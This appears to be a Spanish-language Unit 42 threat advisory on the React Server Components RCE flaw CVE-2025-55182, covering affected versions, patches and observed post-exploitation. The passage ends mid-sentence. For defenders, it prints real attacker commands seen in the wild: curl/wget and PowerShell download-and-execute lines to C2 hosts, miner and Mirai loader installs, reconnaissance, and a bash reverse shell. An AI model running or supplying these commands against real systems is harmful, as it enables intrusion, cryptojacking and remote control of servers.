{"id":167647,"date":"2025-12-12T09:40:44","date_gmt":"2025-12-12T17:40:44","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=167647"},"modified":"2025-12-16T07:40:24","modified_gmt":"2025-12-16T15:40:24","slug":"cve-2025-55182-react-and-cve-2025-66478-next","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/es-la\/cve-2025-55182-react-and-cve-2025-66478-next\/","title":{"rendered":"Explotaci\u00f3n de Vulnerabilidad Cr\u00edtica en React Server Components (Actualizado el 12 de diciembre)"},"content":{"rendered":"<h2><a id=\"post-167647-_63i6ncavhhow\"><\/a>Resumen Ejecutivo<\/h2>\n<p><b>Actualizaci\u00f3n del 12 de diciembre de 2025<\/b><\/p>\n<p><span style=\"font-weight: 400;\">Unit 42 descubri\u00f3 el <\/span><b>KSwapDoor<\/b><span style=\"font-weight: 400;\">, una amenaza nunca antes vista. Este <\/span><i><span style=\"font-weight: 400;\">backdoor<\/span><\/i><span style=\"font-weight: 400;\"> (puerta trasera) de Linux fue confundido inicialmente con BPFDoor.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Las caracter\u00edsticas clave incluyen:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Red de malla (<\/b><b><i>mesh<\/i><\/b><b>) P2P:<\/b><span style=\"font-weight: 400;\"> Permite el enrutamiento de m\u00faltiples saltos para comunicaciones C2 robustas.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Cifrado robusto:<\/b><span style=\"font-weight: 400;\"> Utiliza AES-256-CFB con intercambio de claves Diffie-Hellman.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Sigilo y persistencia:<\/b><span style=\"font-weight: 400;\"> Imita un demonio de intercambio (<\/span><i><span style=\"font-weight: 400;\">swap daemon<\/span><\/i><span style=\"font-weight: 400;\">) leg\u00edtimo del kernel de Linux.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Acceso remoto completo:<\/b><span style=\"font-weight: 400;\"> Ofrece una <\/span><i><span style=\"font-weight: 400;\">shell<\/span><\/i><span style=\"font-weight: 400;\"> interactiva, ejecuci\u00f3n de comandos, operaciones de archivos y escaneo de movimiento lateral.<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167647-_704wg6w4u4ux\"><\/a><strong>Actualizaci\u00f3n del 9 de dic., 2025<\/strong><\/h3>\n<p>Unit 42 ha identificado una actividad que, seg\u00fan se informa, coincide con la herramienta Contagious Interview de Corea del Norte (RPDC), aunque por el momento no se ha producido ninguna atribuci\u00f3n formal. <a href=\"https:\/\/unit42.paloaltonetworks.com\/tag\/contagious-interview\/\" target=\"_blank\" rel=\"noopener\">Contagious Interview es una campa\u00f1a<\/a> en la que agentes maliciosos asociados con la RPDC se hacen pasar por reclutadores para instalar malware en los dispositivos de personas que buscan empleo en el sector tecnol\u00f3gico.<\/p>\n<p>La actividad observada incluye EtherRAT. Seg\u00fan se informa, el actor malicioso UNC5342 de Corea del Norte <a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-adopts-etherhiding\" target=\"_blank\" rel=\"noopener\">est\u00e1 utilizando la t\u00e9cnica EtherHiding<\/a> para distribuir malware y robar criptomonedas. EtherHiding aprovecha la tecnolog\u00eda blockchain para almacenar y recuperar cargas maliciosas.<\/p>\n<p><span style=\"font-weight: 400;\">Adicionalmente, hemos observado instancias del <\/span><i><span style=\"font-weight: 400;\">backdoor<\/span><\/i><span style=\"font-weight: 400;\"> de Linux KSwapDoor (previamente identificado como BPFDoor en este art\u00edculo antes del 12 de diciembre).<\/span><\/p>\n<p>Por \u00faltimo, Unit 42 ha detectado m\u00faltiples casos de una puerta trasera Auto-color no documentada anteriormente. <a href=\"https:\/\/unit42.paloaltonetworks.com\/new-linux-backdoor-auto-color\/\" target=\"_blank\" rel=\"noopener\">Auto-color se hace pasar por una biblioteca leg\u00edtima del M\u00f3dulo de autenticaci\u00f3n conectable<\/a> (PAM) (<span style=\"font-family: 'courier new', courier, monospace;\">pamssod<\/span>).<\/p>\n<p>M\u00e1s detalles se encuentran en la secci\u00f3n<a href=\"https:\/\/docs.google.com\/document\/d\/1-gOX3FcIqQx9xVjJNcelC4HmZbN0inNbt6PziWkZXZg\/edit?tab=t.0#heading=h.jh1zjkh1d3y7\" target=\"_blank\" rel=\"noopener\"> Alcance de la Actividad de Post-Explotaci\u00f3n<\/a>.<\/p>\n<h3><a id=\"post-167647-_eg0m98mr5bxq\"><\/a><strong>Actualizaci\u00f3n del 8 de dic., 2025<\/strong><\/h3>\n<p>Unit 42 ha observado actividad de post-explotaci\u00f3n tras la explotaci\u00f3n de CVE-2025-55182, indicando m\u00faltiples vectores de ataque. Este ataque incluy\u00f3 un reconocimiento inicial que involucr\u00f3 escaneo automatizado en busca de la vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo (RCE), as\u00ed como comandos codificados en Base64 para:<\/p>\n<ul>\n<li>Identificar r\u00e1pidamente los sistemas comprometidos (fingerprinting)<\/li>\n<li>Verificar niveles de privilegios<\/li>\n<li>Mapear interfaces de red<\/li>\n<li>Enumerar credenciales sensibles y configuraciones de DNS<\/li>\n<li>Recuperar binarios maliciosos desde un C2 controlado por el atacante<\/li>\n<\/ul>\n<p>Los atacantes procedieron con actividades de instalaci\u00f3n, aprovechando <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> para descargar y ejecutar scripts maliciosos, incluyendo <span style=\"font-family: 'courier new', courier, monospace;\">sex.sh<\/span> y un dropper de Linux (<span style=\"font-family: 'courier new', courier, monospace;\">x86_64<\/span>) dise\u00f1ado para una infecci\u00f3n persistente. En una instancia, identificamos una shell inversa en bash conectada a un probable servidor de Cobalt Strike.<\/p>\n<p>Adicionalmente, observamos actividad consistente con<a href=\"https:\/\/unit42.paloaltonetworks.com\/from-activity-to-formal-naming\/\" target=\"_blank\" rel=\"noopener\"> un cl\u00faster de actividad que rastreamos como CL-STA-1015<\/a>, un broker de acceso inicial (IAB) con presuntos v\u00ednculos con el Ministerio de Seguridad del Estado de la RPC. Esta actividad involucr\u00f3 la ejecuci\u00f3n sin archivos (fileless) de un script de shell malicioso (<span style=\"font-family: 'courier new', courier, monospace;\">slt<\/span>) v\u00eda <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> o <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span>, seguido de la instalaci\u00f3n de troyanos SNOWLIGHT y VShell.<\/p>\n<p>M\u00e1s detalles se encuentran en la secci\u00f3n<a href=\"https:\/\/www.google.com\/search?q=https:\/\/unit42.paloaltonetworks.com\/cve-2025-55182-react-and-cve-2025-66478-next\/%23post-167619-_jh1zjkh1d3y7\" target=\"_blank\" rel=\"noopener\"> Alcance de la Actividad de Post-Explotaci\u00f3n<\/a>.<\/p>\n<hr \/>\n<p>El 3 de diciembre de 2025, investigadores revelaron p\u00fablicamente vulnerabilidades cr\u00edticas de ejecuci\u00f3n remota de c\u00f3digo (RCE) en el protocolo Flight utilizado por React Server Components (RSC).<\/p>\n<p>Originalmente, el fallo se rastre\u00f3 como dos vulnerabilidades,<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-55182\" target=\"_blank\" rel=\"noopener\"> CVE-2025-55182<\/a> (React) y<a href=\"https:\/\/nextjs.org\/blog\/CVE-2025-66478\" target=\"_blank\" rel=\"noopener\"> CVE-2025-66478<\/a> (Next.js). A ambas se les asign\u00f3 una calificaci\u00f3n de severidad m\u00e1xima de CVSS 10.0.<\/p>\n<p>CVE-2025-66478 ha sido rechazado desde entonces como un duplicado de CVE-2025-55182.<\/p>\n<p>El fallo permite a atacantes no autenticados ejecutar c\u00f3digo arbitrario en el servidor a trav\u00e9s de la deserializaci\u00f3n insegura de solicitudes HTTP maliciosas. Las pruebas indican que el exploit tiene una confiabilidad cercana al 100% y no requiere cambios en el c\u00f3digo para ser efectivo contra configuraciones predeterminadas. Aunque no hubo reportes de explotaci\u00f3n \"in the wild\" al 3 de diciembre de 2025, Unit 42 ha observado desde entonces actividad de post-explotaci\u00f3n, como se detalla en nuestras actualizaciones.<\/p>\n<p>React est\u00e1 fuertemente implementado en entornos empresariales, utilizado por aproximadamente el 40% de todos los desarrolladores, mientras que Next.js es utilizado por aproximadamente el 18%-20%. Esto lo convierte en el framework del lado del servidor l\u00edder para el ecosistema React.<\/p>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> de Palo Alto Networks ha identificado la presencia de m\u00e1s de 968,000 instancias de React y Next.js en nuestra telemetr\u00eda.<\/p>\n<p>CVE-2025-55182 impacta el ecosistema de React 19 y los frameworks que lo implementan. Espec\u00edficamente, afecta a las siguientes versiones:<\/p>\n<ul>\n<li><strong>React<\/strong>: Versiones 19.0, 19.1 y 19.2<\/li>\n<li><strong>Next.js<\/strong>: Versiones 15.x y 16.x (App Router), as\u00ed como builds Canary a partir de 14.3.0<\/li>\n<li><strong>Otros frameworks<\/strong>: Cualquier biblioteca que empaquete la implementaci\u00f3n react-server, incluyendo React Router, Waku, RedwoodSDK, y plugins de Parcel y Vite RSC.<\/li>\n<\/ul>\n<p>Los clientes de Palo Alto Networks reciben protecciones y mitigaciones para CVE-2025-55182 de las siguientes maneras:<\/p>\n<ul>\n<li><a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> y<a href=\"https:\/\/docs.paloaltonetworks.com\/dns-security\" target=\"_blank\" rel=\"noopener\"> Advanced DNS Security<\/a><\/li>\n<li><a href=\"https:\/\/docs.paloaltonetworks.com\/ngfw\" target=\"_blank\" rel=\"noopener\">Next-Generation Firewall<\/a> con la suscripci\u00f3n de seguridad<a href=\"https:\/\/docs.paloaltonetworks.com\/advanced-threat-prevention\/administration\" target=\"_blank\" rel=\"noopener\"> Advanced Threat Prevention<\/a><\/li>\n<li>Los agentes de<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\"> Cortex XDR<\/a> y<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\"> XSIAM<\/a> ayudan a proteger contra actividades de post-explotaci\u00f3n utilizando el enfoque de protecci\u00f3n multicapa<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> est\u00e1 dise\u00f1ado para identificar dispositivos y aplicaciones expuestos en la internet p\u00fablica y escalar estos hallazgos a los defensores<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cloud\" target=\"_blank\" rel=\"noopener\">Cortex Cloud<\/a> y<a href=\"https:\/\/www.paloaltonetworks.com\/prisma\/cloud\/cloud-code-security\" target=\"_blank\" rel=\"noopener\"> Prisma Cloud<\/a> tienen capacidades de detecci\u00f3n para recursos en la nube expuestos a la vulnerabilidad discutida en este resumen<\/li>\n<\/ul>\n<p>Palo Alto Networks tambi\u00e9n recomienda actualizar a las siguientes versiones reforzadas de inmediato:<\/p>\n<ul>\n<li>React: Actualizar a 19.0.1, 19.1.2 o 19.2.1<\/li>\n<li>Next.js: Actualizar a las \u00faltimas versiones estables con parche, incluyendo 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 o 15.0.5<\/li>\n<\/ul>\n<p>El<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\"> equipo de Respuesta a Incidentes de Unit 42<\/a> puede ser contactado para ayudar con un compromiso o para proporcionar una evaluaci\u00f3n proactiva para reducir su riesgo.<\/p>\n<table style=\"width: 94.4388%;\">\n<thead>\n<tr style=\"height: 23px;\">\n<td style=\"width: 35%; height: 23px;\"><b>Vulnerabilidades Discutidas<\/b><\/td>\n<td style=\"width: 172.846%; height: 23px;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/cve-2025-55182-es-la\/\" target=\"_blank\" rel=\"noopener\"><b>CVE-2025-55182<\/b><\/a>, <strong><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/cve-2025-66478-es-la\/\" target=\"_blank\" rel=\"noopener\">CVE-2025-66478<\/a><\/strong><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-167647-_ccrtmytvhvh5\"><\/a>Detalles de la Vulnerabilidad: CVE-2025-55182 (React)<\/h2>\n<p>CVE-2025-55182 est\u00e1 clasificada como Cr\u00edtica (CVSS 10.0) y es causada por una deserializaci\u00f3n insegura dentro de la arquitectura RSC, espec\u00edficamente involucrando el protocolo Flight.<\/p>\n<p>La vulnerabilidad reside en el paquete <span style=\"font-family: 'courier new', courier, monospace;\">react-server<\/span> y su implementaci\u00f3n del protocolo RSC Flight. Es un fallo l\u00f3gico de deserializaci\u00f3n donde el servidor procesa payloads RSC de manera segura.<\/p>\n<p>Cuando un servidor recibe un payload HTTP especialmente dise\u00f1ado y malformado (t\u00edpicamente a trav\u00e9s de datos entregados en una solicitud POST), falla en validar correctamente la estructura de los datos. Debido a esta deserializaci\u00f3n insegura, el servidor permite que datos controlados por el atacante influyan en la l\u00f3gica de ejecuci\u00f3n del lado del servidor.<\/p>\n<p><span style=\"font-weight: 400;\">Esto resulta en RCE, permitiendo a un atacante ejecutar c\u00f3digo JavaScript arbitrario privilegiado en el servidor.<\/span><\/p>\n<h3><a id=\"post-167647-_jxrj0wwbxlpd\"><\/a><strong>Vector de Ataque y Explotabilidad<\/strong><\/h3>\n<ul>\n<li><strong>Complejidad del ataque:<\/strong> La complejidad del ataque es baja. No requiere interacci\u00f3n del usuario ni privilegios (no autenticado).<\/li>\n<li><strong>Endpoints objetivo:<\/strong> El ataque se dirige a los endpoints de React Server Function.\n<ul>\n<li><strong>Matiz cr\u00edtico:<\/strong> Incluso si una aplicaci\u00f3n no implementa o utiliza estrictamente React Server Functions, sigue siendo vulnerable si la aplicaci\u00f3n soporta React Server Components en general.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Confiabilidad:<\/strong> Las pruebas han demostrado que el exploit tiene una confiabilidad cercana al 100%.<\/li>\n<li><strong>Configuraci\u00f3n predeterminada:<\/strong> La vulnerabilidad est\u00e1 presente en configuraciones predeterminadas. Por ejemplo, una aplicaci\u00f3n Next.js est\u00e1ndar creada con <span style=\"font-family: 'courier new', courier, monospace;\">create-next-app<\/span> y construida para producci\u00f3n es explotable sin ning\u00fan cambio de c\u00f3digo por parte del desarrollador.<\/li>\n<\/ul>\n<h3><a id=\"post-167647-_tck45dcouhm\"><\/a><strong>Componentes Afectados Espec\u00edficos<\/strong><\/h3>\n<p>Aunque se describe generalmente como afectando a React y Next.js, la vulnerabilidad existe t\u00e9cnicamente dentro de paquetes subyacentes espec\u00edficos que manejan el renderizado del lado del servidor y la carga de m\u00f3dulos.<\/p>\n<h4><a id=\"post-167647-_lt7h7tmop0p8\"><\/a>Paquetes Afectados<\/h4>\n<p>La vulnerabilidad est\u00e1 presente en las versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0 de los siguientes paquetes:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-webpack<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-parcel<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-turbopack<\/span><\/li>\n<\/ul>\n<h4><a id=\"post-167647-_dh1b18cg30sf\"><\/a>Implementaciones de Framework Afectadas<\/h4>\n<p>Cualquier framework que empaquete estos paquetes est\u00e1 afectado:<\/p>\n<ul>\n<li>Next.js: Versiones 15.x y 16.x (App Router), as\u00ed como builds Canary a partir de 14.3.0-canary.77<\/li>\n<li>Otros ecosistemas: React Router, Waku, RedwoodSDK, Parcel y el plugin Vite RSC est\u00e1n todos afectados si utilizan los paquetes vulnerables de React.<\/li>\n<\/ul>\n<h2><a id=\"post-167647-_dzpz5acpi16a\"><\/a>Alcance de la Actividad de Post-Explotaci\u00f3n<\/h2>\n<p>Unit 42 ha observado sesiones interactivas relacionadas con la explotaci\u00f3n de CVE-2025-55182, incluyendo:<\/p>\n<ul>\n<li>Escaneo de servidores vulnerables a RCE<\/li>\n<li>Reconocimiento<\/li>\n<li>Intento de robo de configuraci\u00f3n de credenciales en la nube y archivos de credenciales<\/li>\n<li>Instalaci\u00f3n de downloaders para recuperar payloads desde la infraestructura de comando y control (C2) del atacante<\/li>\n<li>Intentos de instalar Cobalt Strike<\/li>\n<li>Scripts dropper maliciosos<\/li>\n<li>Software de criptominer\u00eda<\/li>\n<li>Webshells interactivas haci\u00e9ndose pasar por un Administrador de Archivos de React<\/li>\n<li>Ejecuci\u00f3n e instalaci\u00f3n de NOODLERAT<\/li>\n<li>Actividad de IAB<\/li>\n<li>Ejecuci\u00f3n de hallazgos de SNOWLIGHT y VShell<\/li>\n<\/ul>\n<h3><a id=\"post-167647-_p72q6b4ge82q\"><\/a><strong>Escaneo<\/strong><\/h3>\n<p>Estamos observando escaneo automatizado para la vulnerabilidad de RCE:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo $((288*288))\r\n\r\n\/bin\/sh -c echo $((40453*43186))\r\n\/bin\/sh -c powershell -c \\288*288\\\r\n\r\n\/bin\/sh -c $(curl -s http:\/\/help.093214[.]xyz:9731\/fn32.sh | bash | gzip -n | base64 -w0),\/bin\/sh -c echo VULN_CHECK_SUCCESS<\/pre>\n<p>El reconocimiento del atacante se ha observado en forma de env\u00edo de comandos codificados en Base64 para obtener conocimiento situacional inmediato despu\u00e9s de comprometer un sistema. Los atacantes identifican r\u00e1pidamente el sistema operativo y la arquitectura (<span style=\"font-family: 'courier new', courier, monospace;\">uname<\/span>), verifican su nivel de privilegio actual (<span style=\"font-family: 'courier new', courier, monospace;\">id<\/span>) y mapean las interfaces de red (<span style=\"font-family: 'courier new', courier, monospace;\">hostname<\/span>).<\/p>\n<p>La secuencia concluye enumerando el sistema de archivos en busca de credenciales sensibles y analizando configuraciones de DNS (<span style=\"font-family: 'courier new', courier, monospace;\">resolv.conf<\/span>) para identificar entornos en la nube u objetivos internos para movimiento lateral.<\/p>\n<p>El formato para ejecutar comandos de reconocimiento es:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo &lt;base64-encoded text&gt; | base64 -d | sh | base64 -w0<\/pre>\n<p>El comando Base64 decodificado ejecuta los siguientes comandos de reconocimiento:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh uname -a ; id ;hostname -I ; ls -la \/ ; ls -la ~ ;cat \/etc\/hosts;cat \/etc\/resolv.conf<\/pre>\n<h3><a id=\"post-167647-_2j30raueoy9q\"><\/a><strong>Actividad de Instalaci\u00f3n de Malware \"Commodity\"<\/strong><\/h3>\n<p>Unit 42 ha observado m\u00faltiples cl\u00fasteres de actividad relacionados con el despliegue de software de criptominer\u00eda, as\u00ed como otros loaders de malware tipo \"commodity\" (mercanc\u00eda com\u00fan).<\/p>\n<p>En una instancia, los atacantes pasaron una secuencia de ataque de descarga y ejecuci\u00f3n usando <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> para recuperar un script malicioso (llamado <span style=\"font-family: 'courier new', courier, monospace;\">sex.sh<\/span>) desde un servidor C2 controlado por el atacante. El atacante emple\u00f3 el operador <span style=\"font-family: 'courier new', courier, monospace;\">&amp;&amp;<\/span> para crear una cadena condicional, asegurando que el script malicioso se pase al int\u00e9rprete bash para su ejecuci\u00f3n inmediata solo despu\u00e9s de haber sido descargado exitosamente al disco.<\/p>\n<p>En otra, se utiliz\u00f3 un script automatizado para realizar robo de datos, verificaci\u00f3n e instalar m\u00faltiples downloaders de malware consistentes con actividad de internet de las cosas (IoT), como una<a href=\"https:\/\/unit42.paloaltonetworks.com\/tag\/mirai\/\" target=\"_blank\" rel=\"noopener\"> botnet Mirai<\/a>.<\/p>\n<p>Los comandos \"desarmados\" (defanged) son:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c wget hxxp[:]\/\/46.36.37[.]85:12000\/sex.sh &amp;&amp; bash sex.sh\r\n\r\n\/bin\/sh -c $(curl -s http:\/\/keep.camdvr[.]org:8000\/d5.sh | bash | gzip -n | base64 -w0),\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo $((42259*42449)),\/bin\/sh -c wget http:\/\/superminecraft.net[.]br:3000\/sex.sh &amp;&amp; bash sex.sh,\/bin\/sh -c wget https:\/\/sup001.oss-cn-hongkong.aliyuncs[.]com\/123\/python1.sh &amp;&amp; chmod 777 python1.sh &amp;&amp; .\/python1.sh\r\n\r\n45.134.174[.]235\/2.sh\r\n\r\n45.134.174[.]235\/solra\r\n\r\n45.134.174.235\/?h=45.134.174.235&amp;p=80&amp;t=tcp&amp;a=l64&amp;stage=true\r\n\r\nDecoded and Defanged command:\r\n\r\n\/bin\/sh -c (wget -qO- http:\/\/156.234.209[.]103:20912\/get.sh || curl -fsSL http:\/\/156.234.209[.]103:20912\/get.sh) | bash,\/bin\/sh -c curl -s -L https:\/\/raw.githubusercontent.com\/C3Pool\/xmrig_setup\/master\/setup_c3pool_miner .sh | bash -s &lt;encoded Monero address&gt;,\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo $((42636*43926)),\/bin\/sh -c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http:\/\/156.234.209[.]103:63938\/nrCrQ')\r\n\r\nDecoded and Defanged command:\r\n\r\n\/bin\/sh -c echo wget -O \/tmp\/test.sh http:\/\/31.57.46.28\/test.sh&amp;&amp;sh \/tmp\/test.sh|base64 -d|sh,\/bin\/sh -c id &amp;&amp; pwd &amp;&amp; ls -la &amp;&amp; ps aux | grep node\r\n\r\n(command -v curl &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; curl -s hxxp:\/\/47.84.57[.]207\/index | bash) || (command -v wget &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; wget -q -O- hxxp:\/\/47.84.57[.]207\/index | bash) || (command -v python3 &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; python3 -c \"import urllib.request as u,subprocess; subprocess.Popen(['bash'], stdin=subprocess.PIPE).communicate(u.urlopen('hxxp:\/\/47.84.57.207\/index').read())\") || (command -v python &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; python -c \"import urllib2 as u,subprocess; subprocess.Popen(['bash'], stdin=subprocess.PIPE).communicate(u.urlopen('hxxp:\/\/47.84.57[.]207\/index').read())\")<\/pre>\n<p>La figura 1 muestra el flujo del ataque del despliegue de XMRIG tal y como se ve en Cortex XDR.<\/p>\n<figure id=\"attachment_168499\" aria-describedby=\"caption-attachment-168499\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168499 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-641091-167647-1.png\" alt=\"\u00c1rbol de procesos de Cortex XDR para la implementaci\u00f3n de malware. La captura de pantalla muestra dos rutas de archivo en puntos de ejecuci\u00f3n separados. La ruta est\u00e1 marcada con iconos de s\u00edmbolos de advertencia, que muestran el flujo del ataque. \" width=\"1000\" height=\"191\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-641091-167647-1.png 1557w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-641091-167647-1-786x150.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-641091-167647-1-768x146.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-641091-167647-1-1536x293.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-168499\" class=\"wp-caption-text\">Figura 1. Flujo de ataque del despliegue de XMRIG.<\/figcaption><\/figure>\n<p><em>Figura 2 es una notificaci\u00f3n de alerta en Cortex XDR para actividad de XMRig.<\/em><\/p>\n<figure id=\"attachment_168510\" aria-describedby=\"caption-attachment-168510\" style=\"width: 461px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168510 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-643583-167647-2.png\" alt=\"Captura de pantalla de la alerta de Cortex XDR. Se ha ocultado parte de la informaci\u00f3n. Se ha bloqueado la comunicaci\u00f3n del grupo de mineros de criptomonedas y la alerta se ha clasificado como malware. \" width=\"461\" height=\"606\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-643583-167647-2.png 461w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-643583-167647-2-335x440.png 335w\" sizes=\"(max-width: 461px) 100vw, 461px\" \/><figcaption id=\"caption-attachment-168510\" class=\"wp-caption-text\">Figura 2. Alerta de Cortex XDR para actividad de XMRig.<\/figcaption><\/figure>\n<p>En una observaci\u00f3n, el atacante instal\u00f3 un dropper dise\u00f1ado para infectar sistemas Linux. El dropper utiliza un bloque de l\u00f3gica redundante para asegurar que la carga \u00fatil sea entregada. Primero intenta usar <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> sobre el binario con banderas para silenciar la salida y seguir redirecciones, y recurre a <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> si la primera herramienta falta o falla.<\/p>\n<p>Tras la descarga exitosa al directorio <span style=\"font-family: 'courier new', courier, monospace;\">\/tmp<\/span>, el script ejecuta una cadena de comandos para hacer el archivo universalmente ejecutable. Luego lanza inmediatamente la carga \u00fatil, estableciendo la infecci\u00f3n sin intervenci\u00f3n del usuario.<\/p>\n<p>El comando desarmado para esto es:<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c ((curl -sL hxxp[:]\/\/45.32.158[.]54\/5e51aff54626ef7f\/x86_64 -o \/tmp\/x86_64;chmod 777 \/tmp\/x86_64;\/tmp\/x86_64) || (wget hxxp[:]\/\/45.32.158[.]54\/5e51aff54626ef7f\/x86_64 -O \/tmp\/x86_64;chmod 777 \/tmp\/x86_64;\/tmp\/x86_64))<\/pre>\n<h3><a id=\"post-167647-_8gd15fpgleuk\"><\/a>Intentos de explotaci\u00f3n en la nube y contenedores<\/h3>\n<p>Unit 42 tambi\u00e9n observ\u00f3 intentos de explotaci\u00f3n de React2Shell en las principales plataformas en la nube. Estas instancias en la nube objetivo alojaban contenedores, incluido Kubernetes, que ejecutaban aplicaciones vulnerables a la CVE-2025-55182 a trav\u00e9s de componentes de React integrados.<\/p>\n<p>Las operaciones involucraron la ejecuci\u00f3n en l\u00ednea de comandos de <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span>, <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span>, <span style=\"font-family: 'courier new', courier, monospace;\">chmod<\/span> y otras utilidades, ya sea directamente o a trav\u00e9s del binario BusyBox, lo que result\u00f3 en intentos por parte de los atacantes de instalar cargadores (<em>loaders<\/em>) de Mirai y otros <em>payloads<\/em>.<\/p>\n<p>Si bien los atacantes intentaron instalar estos archivos, sus descargas maliciosas fueron bloqueadas, impidiendo as\u00ed su ejecuci\u00f3n.<\/p>\n<pre class=\"lang:default decode:true\"># Witnessed commands\r\n## BusyBox\r\n\/bin\/sh -c (cd \/dev;busybox wget hxxp:\/\/31.56.27[.]76\/n2\/x86;chmod 777 x86;.\/x86 reactOnMynuts;busybox wget -q hxxp:\/\/193.34.213[.]150\/nuts\/bolts -O-|sh)\r\n\r\n## Meshagent Directory String\r\nwget -O \/tmp\/meshagent --no-check-certificate hxxps:\/\/72.62.67[.]33\/meshagents?id=w%40Exooh1EQmSgfpvXk%24Kctk3F4RFhqP5EYgH2mHXjcZDuo3H61xfEs%24OKLnWsj6D&amp;installflags=0&amp;meshinstall=6\r\n\r\n# Container Command Usage\r\nrunc --root \/var\/run\/docker\/runtime-runc\/moby --log \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE_HASH&gt;\/log.json --log-format json create --bundle \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE_HASH&gt; --pid-file \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE HASH&gt;\/init.pid &lt;IMAGE_HASH&gt;<\/pre>\n<h3><a id=\"post-167647-_spoxsm21ibnk\"><\/a><strong>Cobalt Strike<\/strong><\/h3>\n<p>Unit 42 observ\u00f3 a un actor de amenazas aprovechando una shell inversa de bash para conectarse a un probable<a href=\"https:\/\/www.virustotal.com\/gui\/ip-address\/38.162.112.141\/detection\" target=\"_blank\" rel=\"noopener\"> servidor de Cobalt Strike<\/a>:<\/p>\n<pre class=\"lang:default decode:true\">bash -c bash -i &gt;&amp; \/dev\/tcp\/38.162.112[.]141\/8899 0&gt;&amp;1<\/pre>\n<p>Adicionalmente, Unit 42 observ\u00f3 una ejecuci\u00f3n remota de un script bash llamado <span style=\"font-family: 'courier new', courier, monospace;\">check.sh<\/span> desde <span style=\"font-family: 'courier new', courier, monospace;\">154.89.152[.]240<\/span>. Como se muestra en la figura 3, el script es responsable de descargar otro binario desde la misma direcci\u00f3n llamado <span style=\"font-family: 'courier new', courier, monospace;\">a_x64<\/span>, el cual fue guardado bajo el nombre <span style=\"font-family: 'courier new', courier, 